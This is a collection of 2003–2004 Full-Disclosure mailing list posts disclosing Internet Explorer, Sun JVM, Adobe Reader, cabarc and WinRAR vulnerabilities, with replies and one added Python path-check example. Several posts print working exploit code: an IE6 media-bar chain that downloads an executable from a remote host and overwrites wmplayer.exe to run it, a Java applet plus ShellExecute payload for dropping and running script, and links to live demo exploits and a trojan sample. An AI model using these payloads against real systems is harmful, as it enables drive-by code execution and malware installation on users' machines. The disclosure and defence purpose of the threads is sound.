RE: [Full-Disclosure] http://209.50.251.182/new-exploit5/

2004-07-09 Thread Jelmer
Looks familiar :)

http://62.131.86.111/security/newone/exploit.htm


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Julio Canto
Sent: Friday 9 July 2004 10:31
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] http://209.50.251.182/new-exploit5/

> While on vacation I ran across this on a random PC that I was using. It
> looks like your typical adware exploitation.
>
> http://209.50.251.182/new-exploit5/

Looks like Psyme.y (results from www.virustotal.com):

Scan results
 File: EXPLOIT.CHM
 Date: 07/09/2004 10:21:51

 BitDefender    7.0/20040709              found [VBS.Trojan.Psyme.W]
 ClamWin        devel-20040517/20040708   found nothing
 eTrustAV-Inoc  4641/20040708             found nothing
 F-Prot         3.15/20040707             found nothing
 Kaspersky      3.0/20040709              found [TrojanDownloader.VBS.Psyme.y]
 McAfee         4375/20040709             found [VBS/Psyme]
 NOD32v2        1.806/20040707            found [VBS/TrojanDownloader.Psyme.V]
 Norman         5.70.10/20040708          found nothing
 Panda          7.02.00/20040708          found nothing
 Sybari         7.5.1314/20040709         found [TrojanDownloader.VBS.Psyme.y]
 Symantec       8.0/20040708              found nothing
 TrendMicro     7.000/20040709            found [CHM_Psyme.Y]


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html




[Full-Disclosure] IE sucks : sun java virtual machine insecure tmp file creation

2004-07-09 Thread Jelmer

INTRODUCTION

Actually I wasn't really sure if I ought to post this, but after some
consideration I decided that it might serve as an example of the completely
messed up state we find Internet Explorer in today.

There's a very minor issue with the way the Sun Java Virtual Machine creates
temporary files from applets. IE blows it off the chart: combining this with
some unresolved issues in IE can lead to remote code execution.

DETAILS

A couple of days back Marc Schoenefeld posted an advisory about an
implementation flaw in the Sun Java Virtual Machine. By passing a specially
crafted byte array to the Font.createFont method you could get the whole VM
to crash.

My partner in crime HTTP-EQUIV was investigating this report when he noticed
that this demo created a temporary file in his temp folder called

+~JFx.tmp

where x is a random 5-digit number. He mailed me to say "hey, take a look at
this".

I decompiled Marc's class and noticed that the .tmp file being created
contained the exact contents of the byte array that got passed to
Font.createFont.

Now, if you can create a file on someone's disk drive and get your browser to
render it, we've got ourselves something.

OK, creating an applet that creates the file on a user's disk drive is
trivial:


import java.applet.Applet;
import java.awt.Font;
import java.net.URL;
import netscape.javascript.JSObject;

public class Jelmer extends Applet {

    public void init() {
        // Hand the bytes fetched from the "infile" URL to Font.createFont.
        // The JVM copies them verbatim into +~JFxxxxx.tmp in the temp folder
        // (see above); whether the "font" then fails to parse is irrelevant.
        try {
            Font f = Font.createFont(Font.TRUETYPE_FONT,
                new URL(getParameter("infile")).openStream());
        } catch (Exception ignored) {}

        // Tell the hosting page that the file is now on disk.
        try {
            JSObject jsWin = JSObject.getWindow(this);
            jsWin.call("doneloading", new Object[]{});
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

 

This applet creates the file from the URL it gets passed as a parameter and
calls the JavaScript function doneloading when it's done.

We opt to store a file with these contents to the temp:


o=new ActiveXObject('Shell.Application');
o.ShellExecute('cmd.exe','/c pause');

 

HTTP-EQUIV's Jan 1 Shell.Application bug:

http://www.securityfocus.com/archive/1/348688/2003-12-31/2004-01-06/0

Now we have to deal with the random filename. No problem: modern computers
are pretty fast, and the random portion of the filename is only 5 digits.

Using an old bug
(http://lists.netsys.com/pipermail/full-disclosure/2004-February/016881.html)
to check for the existence of local files we can run through every
possibility in a couple of seconds, like this:

 

Function Exists(filename)
    On Error Resume Next
    LoadPicture(filename)
    ' 481 is "Invalid picture": the file is there but is not an image.
    ' A file that does not exist fails with a different error number.
    Exists = Err.Number = 481
End Function

function doneloading() {
    dir = 'C:\\Documents and Settings\\USERNAME\\Local Settings\\Temp\\'
    for (i=0;i<10;i++) {
        filename = '+~JF' + i + '.tmp'

RE: [Full-Disclosure] Just out - KB839645 - wonder what this fixes?

2004-07-13 Thread Jelmer
Count your blessings, that's blazingly fast for Microsoft

This one is over 7 months old; today they finally patched it:

http://packetstormsecurity.org.pk/0312-advisories/ie_showHelp.txt



-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Aaron Horst
Sent: Tuesday 13 July 2004 22:11
To: Matt Ostiguy
Cc: Full-Disclosure ([EMAIL PROTECTED])
Subject: Re: [Full-Disclosure] Just out - KB839645 - wonder what this fixes?

Yet another 6 month old exploit, just fixed!

http://www.securityfocus.com/archive/1/351379

Gotta love the fast Microsoft responses.

AnthraX101


On Tue, 13 Jul 2004 15:02:37 -0400, Matt Ostiguy <[EMAIL PROTECTED]> wrote:
> http://www.microsoft.com/technet/security/bulletin/MS04-024.mspx
> 
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html




RE: [Full-Disclosure] one new trojan

2004-07-24 Thread Jelmer
It abuses the "MSIE JVM bytecode verifier" bug found by LSD in 2002

http://lsd-pl.net/vulnerabilities.html

Patched by

http://www.microsoft.com/technet/security/bulletin/MS03-011.mspx

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Willem Koenings
Sent: Saturday 24 July 2004 19:14
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] one new trojan


hi,

today I encountered a new trojan: web.exe / services.exe. It
arrives in arc.zip and is executed via Java. Kaspersky
doesn't identify this one yet. web.exe is placed in the root
dir, then copied as services.exe to SystemRoot\inetg

if anyone is curious to play with it :

http://conyc.com/galleryg/arc.zip

starter script is here:

http://conyc.com/galleryg/starter.html

willem.



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html




RE: [Full-Disclosure] Re: Microsoft Internet Explorer 6 Protocol Handler Vulnerability

2004-08-06 Thread Jelmer


>I found this vulnerability (or class of them) in July 2003 and 
>described it on several security lists on March 9th, 2004. 

There's at least one instance of prior art that I am aware of:

http://cert.uni-stuttgart.de/archive/bugtraq/2001/03/msg00193.html

I think there have been more but I can't seem to find them

>For examples 
>(actual exploitable vulnerabilities), you can try Google search for 
>"argument injection vulnerability" or read my messages on this list 
>about Outlook mailto: URL vulnerability, Windows Help and Support 
>Center HCP: URL vulnerability, or Lotus Notes notes: URL vulnerability.


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Microsoft cabarc directory traversal

2004-10-12 Thread Jelmer
Description:

Cabarc is a command-line tool to create and extract cabinet files (.cab); it
is included in the Windows Support Tools package.
It is subject to a directory traversal bug similar to those found in unzip,
unarj etc.

Technical Details:

..\file fails

../file defeats the protection

Demonstration:

http://62.131.86.111/security/cabarc/demo.cab

Risk : low


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
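As an added example (not code from the advisory), this is the member-name check an extractor should be doing, written in Python: both separators are treated as separators, drive letters, UNC prefixes and absolute paths are refused, and any ".." component is rejected outright instead of being collapsed. The naive check at the top reproduces the cabarc mistake of only knowing the backslash. The same check covers the WinRAR traversal bug Jelmer points at in his 2003-09-19 reply further down this page. All member names are constructed samples, and the scratch directory is only used to resolve paths.

```python
"""Archive member path check that treats '/' and '\\' alike.

Added example for the cabarc (and WinRAR) traversal reports on this page:
an extractor that rejects "..\\" but lets "../" through. Member names below
are constructed samples.
"""
import os
import re
import tempfile

# Drive letter ("C:...") or a doubled leading separator (UNC "\\\\srv", "//srv").
_DRIVE_OR_UNC = re.compile(r"^(?:[A-Za-z]:|[\\/]{2})")

SAMPLE_MEMBERS = [          # constructed names, as a hostile archive could carry them
    "sub\\file.txt", "sub/file.txt", "../file", "..\\file",
    "dir\\..\\..\\file", "C:\\boot.ini", "\\\\srv\\share\\x", "/etc/passwd",
]


def naive_is_safe(member):
    """Mimics an extractor that only knows the native backslash separator:
    it rejects '..\\file' but happily accepts '../file' (the cabarc bug)."""
    return not member.startswith("\\") and "..\\" not in member


def safe_relative_path(member):
    """Return a normalised forward-slash relative path for an archive member,
    or None if the member must be rejected."""
    if _DRIVE_OR_UNC.match(member):
        return None                      # drive letter or UNC prefix
    unified = member.replace("\\", "/")  # a backslash is a separator too
    if unified.startswith("/"):
        return None                      # absolute path
    parts = []
    for comp in unified.split("/"):
        if comp in ("", "."):
            continue                     # doubled separator or '.' is a no-op
        if comp == "..":
            return None                  # reject, never collapse: 'a/../b' is not a legitimate member
        parts.append(comp)
    return "/".join(parts) or None


def resolve_target(dest, member):
    """Map a member to an absolute path under dest, or raise ValueError.
    The realpath comparison is a second line of defence: it also catches a
    member that points through a symlink an earlier member dropped into dest."""
    rel = safe_relative_path(member)
    if rel is None:
        raise ValueError(f"rejected member name: {member!r}")
    root = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(root, *rel.split("/")))
    if os.path.commonpath([root, target]) != root:
        raise ValueError(f"member escapes {root}: {member!r}")
    return target


def demo(members=SAMPLE_MEMBERS):
    """Resolve every sample against a scratch directory; None means rejected."""
    results = {}
    with tempfile.TemporaryDirectory() as dest:
        root = os.path.realpath(dest)
        for m in members:
            try:
                target = resolve_target(root, m)
                results[m] = os.path.relpath(target, root).replace(os.sep, "/")
            except ValueError:
                results[m] = None
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name!r:28} naive={naive_is_safe(name)!s:5} hardened={outcome}")
```

Rejecting ".." outright rather than normalising it is deliberate: a component that stays inside the destination after collapsing is never something a legitimate archive needs, and refusing it keeps the check free of the "which normalisation wins" questions that produced this bug in the first place.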


[Full-Disclosure] Adobe acrobat / Adobe Reader 6 can read local files

2004-10-12 Thread Jelmer
Adobe acrobat / Adobe Reader 6 can read local files

Description

Acrobat/ Acrobat reader is software for viewing and printing Adobe Portable
Document Format (PDF) files. Adobe PDF files can be viewed on most major
operating systems.

Version 6 of this program has an issue with the way it handles embedding
Macromedia Flash files directly into a PDF. This allows a malicious website
operator to steal local files from a user's hard drive, including cookie
files.

Technical Details:

Version 6 of the PDF format introduced a new way to embed movies directly
into the PDF file. In previous versions one could only link to media in
external files.

Adobe Reader extracts this SWF file from the PDF and saves it under a random
name to your temp dir; on Windows XP and 2000 this dir is usually located at

C:\Documents and Settings\\Local Settings\Temp

It then appears to "link" directly to this saved file, in effect making your
local hard disk the codebase for this SWF file and allowing it read access
to all of the files on your hard drive.

Systems affected:

Adobe reader 6
Adobe acrobat 6

Demonstration:

Create a text file called c:\jelmer.txt then proceed to click on 

http://62.131.86.111/security/acrobat/demo.pdf

Risk: medium


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Re: Adobe acrobat / Adobe Reader 6 can read local files

2004-10-12 Thread Jelmer
The demo uses script behind the scenes to start the movie, so the demo would
fail if you disabled scripting.

I don't believe there's a way to start the movie with scripting disabled, so
you should be safe. But I'll admit to being anything but an expert on PDF
(yet, anyway), so I might be overlooking something.

  --jelmer

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Jay Libove
Sent: Tuesday 12 October 2004 19:01
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Re: Adobe acrobat / Adobe Reader 6 can read local
files


I have Acrobat Reader configured to NOT run Javascript.  The demo did not
work on my system (XP, SP2, Acrobat Reader v6.0.2 dated 5/18/2004).

So, is having JavaScript enabled also a requirement in order for this
embedded SWF exploit to work?

-Jay Libove, CISSP

> Message: 20
> Date: Tue, 12 Oct 2004 15:56:32 +0200
> From: Jelmer <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED], [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Adobe acrobat / Adobe Reader 6 can read local
files

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html




Re: [Full-Disclosure] Internet explorer 6 on windows XP allows execution of arbitrary code

2003-09-12 Thread jelmer
When viewing mail in recent versions of Outlook it operates in the Restricted
zone, i.e. no active scripting is allowed to run, so these won't be
exploitable.
Unless someone proves otherwise, that is ;)



- Original Message - 
From: "Kristian Hermansen" <[EMAIL PROTECTED]>
To: "Full Disclosure" <[EMAIL PROTECTED]>
Sent: Friday, September 12, 2003 2:40 AM
Subject: Re: [Full-Disclosure] Internet explorer 6 on windows XP allows
exection of arbitrary code


> Wow, this one is pretty scary.  Nice work putting it together.  Does
anyone
> know if Outlook is exploitable with this?  I'd think that Outlook would
not
> try to play the media file, but I'm not quite sure.  Wow, what a rush of
> pretty critical bugs lately!!!
>
> Kris Hermansen
>
>
> - Original Message - 
> From: "jelmer" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Cc: <[EMAIL PROTECTED]>
> Sent: Thursday, September 11, 2003 6:31 PM
> Subject: [Full-Disclosure] Internet explorer 6 on windows XP allows
exection
> of arbitrary code
>
>
> > Internet explorer 6 on windows XP allows exection of arbitrary code
> >
> > DESCRIPTION :
> >
> > Yesterday Liu Die Yu released a number series of advisories concerning
> > internet explorer
> > by combining on of these issues with an earlier issue I myself reported
a
> > while back
> > You can construct a specially crafted webpage that can take any action
on
> a
> > users system
> > including but not limited to, installing trojans, keyloggers, wiping the
> > users harddrive etc.
> >
> >
> > TECHNICAL EXPLAINATION :
> >
> > Internet explorer 6 comes with a media sidebar in wich you can load and
> play
> > mediaclips
> > without even leaving the browser. when you instruct the mediabar to load
a
> > file from an
> > unknown host or the HTTP status returned by an existing host indicates
an
> > error
> > this media bar displays an error page inside the media bar namely
> >
> > res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path
> >
> > res URL's are treated as being in the "my computer zone" and are loaded
> from
> > the users filesystem
> > perfect conditions for the issue I describe on
> >
> >
http://www.mail-archive.com/[EMAIL PROTECTED]/msg06791.html
> >
> > To work. now all that is needed is a way to inject this exploit code
into
> > this page
> > This method was graciously provided by Liu Die Yu as you can read on
> >
> > http://www.securityfocus.com/archive/1/336937/2003-09-08/2003-09-14/0
> >
> > Combining these issues we get something like :
> >
> > --snip--
> >
> > 
> >
> > var x = new ActiveXObject("Microsoft.XMLHTTP");
> > x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
> > x.Send();
> >
> > var s = new ActiveXObject("ADODB.Stream");
> > s.Mode = 3;
> > s.Type = 1;
> > s.Open();
> > s.Write(x.responseBody);
> >
> > s.SaveToFile("C:\\Program Files\\Windows Media
> Player\\wmplayer.exe",2);
> > location.href = "mms://";
> >
> > 
> >
> > 
> >
> > function preparecode(code) {
> > result = '';
> > lines = code.split(/\r\n/);
> > for (i=0;i<lines.length;i++) {
> >
> > line = lines[i];
> > line = line.replace(/^\s+/,"");
> > line = line.replace(/\s+$/,"");
> > line = line.replace(/'/g,"\\'");
> > line = line.replace(/[\\]/g,"");
> > line = line.replace(/[/]/g,"%2f");
> >
> > if (line != '') {
> > result += line +'\\r\\n';
> > }
> > }
> > return result;
> > }
> >
> > function doit() {
> > mycode = preparecode(document.all.code.value);
> > myURL = "file:javascript:eval('" + mycode + "')";
> > window.open(myURL,"_media")
> > }
> >
> >
> > window.open("error.jsp","_media");
> >
> > setTimeout("doit()", 5000);
> >
> >
> > 
> >
> > --snip--
> >
> > error.jsp is a jsp page that consists of one line, namely
> >
> > <% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %>
> >
> >
> > DEMONSTRATION :
> >
> > A demonstration is provided at :
> >
> > http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm
> >
> >
> > WORKAROUND :
> >
> > Disable active scripting or do "the sensible thing" and pick another
> browser
> > such as the
> > excellent mozilla firebird.
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Internet explorer 6 on windows XP allows execution of arbitrary code

2003-09-11 Thread jelmer
Internet Explorer 6 on Windows XP allows execution of arbitrary code

DESCRIPTION :

Yesterday Liu Die Yu released a series of advisories concerning Internet
Explorer. By combining one of these issues with an earlier issue I myself
reported a while back, you can construct a specially crafted web page that can
take any action on a user's system, including but not limited to installing
trojans, keyloggers, wiping the user's hard drive, etc.


TECHNICAL EXPLANATION :

Internet Explorer 6 comes with a media sidebar in which you can load and play
media clips without even leaving the browser. When you instruct the media bar
to load a file from an unknown host, or the HTTP status returned by an
existing host indicates an error, the media bar displays an error page inside
the media bar, namely

res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path

res URLs are treated as being in the "My Computer" zone and are loaded from
the user's filesystem: perfect conditions for the issue I describe on

http://www.mail-archive.com/[EMAIL PROTECTED]/msg06791.html

to work. Now all that is needed is a way to inject this exploit code into
this page. This method was graciously provided by Liu Die Yu, as you can read
on

http://www.securityfocus.com/archive/1/336937/2003-09-08/2003-09-14/0

Combining these issues we get something like :

--snip--

// Payload. The page keeps this text in a form field named "code" and reads
// it back through document.all.code.value below: fetch 1.exe, drop it over
// wmplayer.exe with ADODB.Stream, then navigate to an mms:// URL so that the
// replaced wmplayer.exe gets run.

var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
x.Send();

var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);

s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";

// Page script. preparecode() strips and escapes the payload so it survives
// inside a file:javascript: URL. error.jsp is loaded into the media bar so
// that its error status makes the bar show the res:// error page; five
// seconds later the payload is injected into that page.

function preparecode(code) {
    result = '';
    lines = code.split(/\r\n/);
    for (i=0;i<lines.length;i++) {

        line = lines[i];
        line = line.replace(/^\s+/,"");
        line = line.replace(/\s+$/,"");
        line = line.replace(/'/g,"\\'");
        line = line.replace(/[\\]/g,"");
        line = line.replace(/[/]/g,"%2f");

        if (line != '') {
            result += line +'\\r\\n';
        }
    }
    return result;
}

function doit() {
    mycode = preparecode(document.all.code.value);
    myURL = "file:javascript:eval('" + mycode + "')";
    window.open(myURL,"_media")
}

window.open("error.jsp","_media");

setTimeout("doit()", 5000);

--snip--

error.jsp is a jsp page that consists of one line, namely

<% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %>

DEMONSTRATION :

A demonstration is provided at :

http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm


WORKAROUND :

Disable active scripting, or do "the sensible thing" and pick another browser
such as the excellent Mozilla Firebird.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Internet explorer 6 on windows XP allows execution of arbitrary code

2003-09-12 Thread jelmer

- Original Message - 
From: "Thor Larholm" <[EMAIL PROTECTED]>
To: "jelmer" <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Friday, September 12, 2003 1:02 AM
Subject: Re: [Full-Disclosure] Internet explorer 6 on windows XP allows
exection of arbitrary code


> The new addition here is abusing how you are able to load a resource file,
> residing in a local security zone, into a window object. Service Pack 1 for
> IE6 did a lot to deter this on most regular window objects, but should have
> extended that effort to searchpanes as well. Seeing as the content of a
> search pane can be any registered COM extension to IE, perhaps more should
> be done to completely separate these from the reach of ordinary scripting.

Agreed. I noticed they did put some effort into fixing these issues,
e.g. the GreyMagic issue with the malformed XML file, for instance, only
allowed XSS'ing a site containing this file.
Before SP1 one would have been able to script in the res:// page, which would
have much more severe consequences considering that
IE's zoning system is just so horribly and utterly broken. So they did well
on this; the problem is just that Microsoft keeps having these
little oversights, special cases they forget about, such as the res pages in
the media bar, or also recently forgetting to patch the dynamic version of the
object tag.
It's generally a telltale sign of bad software design.


> Combining the mediabar resource loading with the file-protocol proxy
> demonstrates just how effectively one can combine several vulnerabilities
> to achieve a higher level of automation in planting and executing files.
> The media bar resource loading, and any other resource loading technique,
> can be combined with any other cross-domain scripting vulnerability to
> achieve the same result.
>
> We will definitely see more combinatorial vulnerabilities in the time to
> come.

Combining vulnerabilities is nothing new; people always have and always will.
HTTP-EQUIV seems especially well versed in this kind of stuff; remember, for
instance, my mhtml/codebase trick and his Media Player issue, which also led
to code execution.
IE is rather heavily researched, so at any given time you will have quite a
number of unpatched vulnerabilities, as you are probably more aware of than
anybody, considering http://pivx.com/larholm/unpatched/ is your site :)
For non-buffer-overflow code execution, generally a number of conditions has
to be met. In this case it was 3:

- find a way of executing code
- find something to inject the exploit code into
- find something that will allow us to inject exploit code into stuff not
under our control

Separately none of these is particularly dangerous, but combined their full
power is unleashed.
But it's a lot to ask from a single researcher to come up with 3 issues
(unless your name is Liu Die Yu of course :) then you can easily come up with
10 hehe). I got to 2; Liu provided 3.



>
>
> Regards
> Thor Larholm
> PivX Solutions, LLC - Senior Security Researcher
> http://www.pivx.com/larholm/unpatched - Unpatched IE vulnerabilities
>
>
> - Original Message - 
> From: "jelmer" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Cc: <[EMAIL PROTECTED]>
> Sent: Thursday, September 11, 2003 3:31 PM
> Subject: [Full-Disclosure] Internet explorer 6 on windows XP allows
exection of
> arbitrary code
>
>
> > Internet explorer 6 on windows XP allows exection of arbitrary code
> >
> > DESCRIPTION :
> >
> > Yesterday Liu Die Yu released a number series of advisories concerning
> > internet explorer
> > by combining on of these issues with an earlier issue I myself reported
a
> > while back
> > You can construct a specially crafted webpage that can take any action
on a
> > users system
> > including but not limited to, installing trojans, keyloggers, wiping the
> > users harddrive etc.
> 
http://lists.netsys.com/pipermail/full-disclosure/2003-September/009917.html>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] RE:Internet explorer 6 on windows XP allows execution of arbitrary code ( and opera and Mozilla too)

2003-09-12 Thread jelmer
Serious? These, if I understand correctly, merely crash your browser; nothing
particularly serious about that.

Granted, no browser will be without flaws, so there is probably heaps of
stuff to be found in Mozilla as well, but remote code execution??
I don't believe there has been a single flaw in Netscape or Mozilla that
allowed you to execute code simply by putting together some JavaScript
(you can correct me on this), even when it was the dominant browser and
legendary guys like Georgi Guninski roamed the streets.
Sure, it will probably have stuff like overflows, nearly everything does,

but ActiveX in particular is just utterly insane and makes you want to bang
your head against a brick wall screaming "what the hell were they thinking".


- Original Message - 
From: "meme-boi" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Friday, September 12, 2003 2:33 AM
Subject: [Full-Disclosure] RE:Internet explorer 6 on windows XP allows
exection of arbitrary code ( and opera and Mozilla too)


> >WORKAROUND :
>
> >Disable active scripting or do "the sensible thing" and pick another
> >>browser such as the>excellent mozilla firebird.
>
> Mozilla ...
>
> 
> t = new Packages.sun.plugin.javascript.navig5.JSObject(1,1);
> 
>
>
>
> hmmm
>
> or
>
> http://drorshalev.brinkster.net/dev/memeboi/werd.html
>
> Both serious issues mozilla has yet to fix.
>
>
> Or we can look at Opera and conclude that no graphical browser is safe:
>
>
> /usr/bin/opera: line 138:  1289 Segmentation fault
> "${BINARYDIR}/opera" "[EMAIL PROTECTED]"
> "${BINARYDIR}/opera" "[EMAIL PROTECTED]"
> (gdb) /opt/opera/lib/opera/plugins/operamotifwrapper: error while loading
> shared libraries: libXm.so.2: cannot open shared object file: No such file
> or directory
> (gdb) backtrace
> #0  0x21ad4397 in waitpid () from /lib/libc.so.6
> #1  0x080777f6 in kill_pid ()
> #2  0x080767a3 in wait_for ()
> #3  0x080687c6 in execute_command_internal ()
> #4  0x0806c0a7 in execute_command ()
> #5  0x0805d48c in reader_loop ()   <---murder loop
> #6  0x0805b8a0 in main ()
> #7  0x21a407a6 in __libc_start_main () from /lib/libc.so.6 <--redrum lib
> (gdb) info reg
> eax0xfe00   -512
> ecx0x5da26398   1570923416
> edx0x0  0
> ebx0x   -1
> esp0x5da2635c   0x5da2635c
> ebp0x5da26378   0x5da26378
> esi0x0  0
> edi0x   -1
> eip0x21ad4397   0x21ad4397
> eflags 0x246582
> cs 0x23 35
> ss 0x2b 43
> ds 0x2b 43
> es 0x2b 43
> fs 0x0  0
> gs 0x0  0
> fctrl  0x37f895
> fstat  0x0  0
> ftag   0x   65535
> fiseg  0x0  0
> fioff  0x0  0
> foseg  0x0  0
> fooff  0x0  0
> fop0x0  0
> mxcsr  0x0  0
> orig_eax   0x72 114
>
> (gdb) disass $eip-0x20 $eip+0x20
> Dump of assembler code from 0x21ad4377 to 0x21ad43b7:
> 0x21ad4377 :mov$0x7,%dh
> 0x21ad4379 :add%cl,0x2b88b3(%ebx)
> 0x21ad437f :add%cl,0xf685087d(%ebx)
> 0x21ad4385 :jne0x21ad43be 
> 0x21ad4387 :mov0xc(%ebp),%ecx
> 0x21ad438a :mov0x10(%ebp),%edx
> 0x21ad438d :push   %ebx
> 0x21ad438e :mov%edi,%ebx
> 0x21ad4390 :mov$0x72,%eax
> 0x21ad4395 :int$0x80
> 0x21ad4397 :pop%ebx
> 0x21ad4398 :cmp$0xf000,%eax
> 0x21ad439d :mov%eax,%esi
> 0x21ad439f :ja 0x21ad43ae 
> 0x21ad43a1 :mov%esi,%eax
> 0x21ad43a3 :mov0xfff4(%ebp),%ebx
> 0x21ad43a6 :mov0xfff8(%ebp),%esi
> 0x21ad43a9 :mov0xfffc(%ebp),%edi
> 0x21ad43ac :leave
> 0x21ad43ad :ret
> 0x21ad43ae :neg%esi
> 0x21ad43b0 :call   0x21a40980 <__errno_location>
> 0x21ad43b5 :mov%esi,(%eax)
>
>
> Time to revert to command line !
>
> I speak about this on the mighty bugtraq but no one listens. not even friend
> 9or.
> Anyways. I have to go clean the floor at walmart.
>
> ninjas are bad
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Re: Internet explorer 6 on windows XP allows execution of arbitrary code (Demonstration Exploit Warning)

2003-09-13 Thread jelmer
On my system Media Player is a protected file, much like notepad.exe or
telnet.exe are, which means that when you delete or overwrite them they get
put back by the system. I am just invoking it really quick. Maybe they added
this behaviour in WMP9 and on WMP8 the changes are permanent, in which case
you'd have a broken Media Player. If this is true I apologize.

anyway i'll put up links to backup copies on my site when I have the time just 
in case

--jelmer




On Saturday 13 September 2003 15:22, S G Masood wrote:
> Hi,
>
> Jelmer probably forgot to mention this about the
> demonstration exploit[1] in his advisory[2]: Back up
> "C:\Program Files\Windows Media Player\wmplayer.exe"
> before using the exploit as the exploit replaces the
> original wmplayer.exe(main WMP executable) with the
> dropped file(also named wmplayer.exe). After
> exploitation, the dropped wmplayer.exe can be deleted
> and the backed-up, original version replaced.
>
> If this is not done, the existing installation of
> Windows Media Player will be damaged and will have to
> be reinstalled. And, of course, since the exploit
> depends on replacing the WMP executable, it will not
> work if Media Player is running. Test the exploit
> while Media Player is not running.
>
> Tested here successfully with Win2kSP0 IE6 WMP9.
>
>
> [1]Exploit ->
> http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm
> [2]http://www.securityfocus.com/archive/1/337285
>
>
> --
> Regards,
> S.G.Masood
> Hyderabad,
> India.
>
>
>
> --
> `You don't believe in me,' observed the Ghost.`Why do
> you doubt your senses?'
> `Because,' said Scrooge, `a little thing affects them.
> A slight disorder of the stomach makes them cheats.
> You may be an undigested bit of beef, a blot of
> mustard, a crumb of cheese, a fragment of an underdone
> potato. There's more of gravy than of grave about you,
> whatever you are!'
>
> -Charles Dickens in `A Christmas Carol'
> --
>
>
>
>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Winrar doesn't determine the actual size of compressed files

2003-09-19 Thread jelmer
Speaking of which...

It also has the directory traversal bug described at

http://lists.insecure.org/lists/bugtraq/2003/May/0113.html

Just test with the .zip file located there.
Tested on 3.20.


- Original Message - 
From: "Bipin Gautam" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, September 09, 2003 1:01 PM
Subject: [Full-Disclosure] Winrar doesn't determine the actual size of
compressed files


> ---[ about WinRAR]---
> Winrar (http://www.rarsoft.com/) is one of the most popular file
> compression utilities for Windows.
>
> --[summary]---
> Winrar incorrectly determines the actual size of compressed files saved in
> .rar format by reading its header information.
>
> --[details]--
> Recently we managed to devise a technique to spoof the header and create a
> valid CRC checksum. Later we found that Winrar only depends on its header
> information and CRC checksum to determine the size and integrity of .rar
> files. Before uncompressing .rar files, Winrar pre-allocates space according
> to the actual file size specified in the header to avoid fragmentation. But
> pre-allocation occurs without checking the available hdd space. Then it goes
> on extracting, even if the hdd size is less than the size of the files. We
> did a test by extracting 1GB files on a hdd with 700MB free space.
>
> Surprisingly, we later discovered that even on detecting header corruption
> WinRAR doesn't abort the extraction process. This leads WinRAR to believe
> that the actual size is correct. We managed to exploit this and create a
> proof of concept to demonstrate this problem by changing the actual file
> size in its header. When it starts extracting it doesn't find any valid
> data in the archive and, on the basis of its header, attempts to extract
> 1 gigabyte of data and simply goes on writing "0x00", filling up valuable
> hdd space.
>
> --[Proof of concept]--
> The proof of concept is a valid .rar file which is just 100 bytes, but its
> header has been forged to fool Winrar into thinking that it's a 1 gigabyte
> file, by forging its header and creating a valid CRC checksum. All versions
